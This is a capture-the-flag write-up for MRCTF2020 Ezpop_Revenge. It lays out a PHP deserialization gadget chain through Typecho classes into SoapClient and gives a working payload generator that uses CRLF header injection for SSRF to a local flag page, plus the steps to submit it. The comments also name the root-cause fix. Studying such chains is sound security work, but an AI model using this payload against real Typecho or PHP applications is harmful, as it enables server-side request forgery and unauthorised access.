# [MRCTF2020]Ezpop_Revenge
反序列化 pop 链:
HelloWorld_DB::__wakeup -> Typecho_Db::__construct (via __toString) -> Typecho_Db_Query::__construct -> ($this->_adapter = new SoapClient) -> SSRF
payload:
<?php | |
// PoC generator for the pop chain listed above. The chain only works because the
// application unserialize()s attacker-controlled input (the C0incid3nc3 POST value
// per the note below); the root-cause fix is to never unserialize untrusted data
// (use json_decode) and to reject unexpected classes if unserialize must be kept.
// NOTE: the trailing "| |" on each line is table-extraction residue, not PHP.
class Typecho_Db_Query | |
{ | |
// Class and property names mirror the real Typecho_Db_Query so the serialized
// blob maps onto the target's own class definition.
private $_sqlPreBuild; | |
private $_adapter; | |
public function __construct() | |
{ | |
// Loopback URL the server will request on the attacker's behalf (the SSRF).
$target = 'http://127.0.0.1/flag.php'; | |
// Extra request headers. They are joined with '^^', which the script later
// rewrites to CRLF, so each entry becomes its own header line.
$headers = array( | |
'X-Forwarded-For: 127.0.0.1', | |
'Cookie: PHPSESSID=rd6u7agm56jsrqqrrni0f6s1r6' | |
); | |
// Non-WSDL SoapClient; 'location' is where the request goes and the 'user_agent'
// option carries the CRLF-separated headers (relies on SoapClient emitting the
// user_agent value unfiltered — the well-known CRLF injection this writeup uses).
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'HyyMbb^^'.join('^^',$headers),'uri' => "aaab")); | |
// presumably required by Typecho_Db::__construct's handling of the query — verify
// against the challenge source.
$this->_sqlPreBuild =array("action"=>"SELECT"); | |
$this->_adapter = $b; | |
} | |
} | |
class HelloWorld_DB | |
{ | |
private $coincidence; | |
public function __construct() | |
{ | |
// $coincidence is what the target's HelloWorld_DB::__wakeup walks into
// (see the chain above); the key name "hello" is taken from the writeup.
$this->coincidence = ["hello" => new Typecho_Db_Query()]; | |
} | |
} | |
// Build the object graph and serialize it (private props serialize with \0 bytes,
// which is why the result is base64-encoded below).
$a = new HelloWorld_DB(); | |
$aaa = serialize($a); | |
// Turn the '^^' placeholders into real CRLF header separators.
$aaa = str_replace('^^',"\r\n",$aaa); | |
// As shown here this replace is a no-op ('&' -> '&'); the original most likely
// read '&amp;' and was decoded by the page rendering — TODO confirm against source.
$aaa = str_replace('&','&',$aaa); | |
echo base64_encode($aaa); |
先从 flag 获取 sessionid,再直接 payload 使用 POST 方式把上面的输出放到 C0incid3nc3 变量中即可。然后在 GET 参数上再加一个 admin 变量即可出现 flag 的值。
参考链接:https://www.cnblogs.com/CAPD/p/17835715.html
https://cn-sec.com/archives/1113428.html